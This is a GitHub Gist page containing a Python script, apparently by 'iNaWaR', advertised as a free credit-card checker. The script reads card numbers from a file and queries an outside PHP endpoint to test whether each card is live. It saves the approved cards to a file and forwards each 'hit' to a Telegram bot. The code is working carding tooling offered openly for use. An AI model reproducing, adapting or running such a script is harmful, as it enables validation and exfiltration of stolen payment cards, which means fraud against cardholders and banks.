Last active
April 26, 2025 02:29
-
-
Save iNawaR1/6bacc531cee1c88be290e52d62f1bfe4 to your computer and use it in GitHub Desktop.
drago is a {FREE} CC checker if it's dead/Live or Declined. you can enter your telegram bot token and your ID you will recive all the hits From your bot. THIS TOOL USES a PHP API.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#the tool is slow but it will give you High Quality results!! | |
import requests | |
import time | |
headers = { | |
'alt-svc': 'h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400', | |
'cf-cache-status': 'DYNAMIC', | |
'cf-ray': '6c9fe639ebad2b95-FRA', | |
'content-encoding': 'br', | |
'content-type': 'application/json; charset=utf-8', | |
'date': 'Fri, 07 Jan 2022 20:22:39 GMT', | |
'expect-ct': 'max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"', | |
'nel': '{"success_fraction":0,"report_to":"cf-nel","max_age":604800}', | |
'report-to': '{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vdwlT7ZeWN2SHsCpzckIffq94eCug0OuQCV%2Bwpw12sXYr3yOU16kAyxm5zHfcRJAAszrO7YI2%2BvYwg2Fw%2BTBtz%2Bn2gn8AFp%2F8cXfmHxcq4bjDL1ZQGWp7dQJkdPvkeAWvetPlZUuQzKv"}],"group":"cf-nel","max_age":604800}', | |
'server': 'cloudflare', | |
'x-powered-by': 'PHP/7.4.27', | |
} | |
red = "\033[1;31;40m"; | |
yel = '\033[1;33;40m' | |
grn = '\033[1;32;40m'; | |
wit = "\033[1;37;40m" | |
do = '\033[1;37m' | |
print(f""" | |
{grn} \n███╗░░██╗░█████╗░░██╗░░░░░░░██╗░█████╗░██████╗{red} \n████╗░██║██╔══██╗░██║░░██╗░░██║██╔══██╗██╔══██╗{grn} \n██╔██╗██║███████║░╚██╗████╗██╔╝███████║██████╔╝ {red} \n██║╚████║██╔══██║░░████╔═████║░██╔══██║██╔══██╗{grn} \n██║░╚███║██║░░██║░░╚██╔╝░╚██╔╝░██║░░██║██║░░██║{red} \n═╝░░╚══╝╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝░░╚═╝╚═╝░░╚═╝ | |
CC {yel}CHECKER{wit} | |
▄︻̷̿┻̿═━一 {yel}BY {red} iNaWaR {wit}╾━╤デ╦︻ """) | |
iNaWaR = 'cc.txt' | |
file = open(iNaWaR, 'r') | |
ID_tele=input(f"{yel}[?] id Telegram : ") | |
token_bot=input(f"{yel}[?] bot Token : ") | |
while True: | |
cc = file.readline().split('\n')[0] | |
if cc == '': | |
break | |
checker =f'https://khafeer.ml/CVV/cc3.php?card={cc}' | |
rq = requests.get(checker, headers=headers) | |
time.sleep(5) # the higher the number u enter the better result you will get!!!.. | |
if 'Declined' in rq.text: | |
print(f'{red} Declined') | |
elif 'Error' in rq.text: | |
print(f' {red}Incorrect Card Number') | |
elif 'Dead' in rq.text: | |
print(f' {red}Dead') | |
elif 'Approved' in rq.text: | |
print(f' {grn}Live --> {cc}') | |
with open('LIVE CC.txt', 'a') as x: | |
tl = 'By iNaWaR --> ' | |
x.write(tl + cc + '\n') | |
tele = ( | |
f'https://api.telegram.org/bot{token_bot}/sendMessage?chat_id={ID_tele}&text=\n𖡃 𝚄𝚂𝙴𝚁: {cc}\n\n @iNaWaR1 New Hunt ') | |
re = requests.post(tele) | |
time.sleep(0.1) | |
else: | |
print('error') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment